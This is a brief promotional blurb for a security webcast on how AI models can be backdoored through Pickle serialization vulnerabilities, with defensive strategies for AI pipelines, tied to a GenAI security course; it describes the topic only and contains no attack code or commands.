During this Webcast we will examines how AI models can be backdoored using vulnerabilities in serialization formats like Pickle. We will highlight the risks of untrusted models, demonstrate real-world techniques, and discuss strategies to secure AI pipelines against such attacks.
This webcast supports content and knowledge from SEC545: GenAI and LLM Application Security™. To learn more about this course, explore upcoming sessions, and access your FREE demo, click here.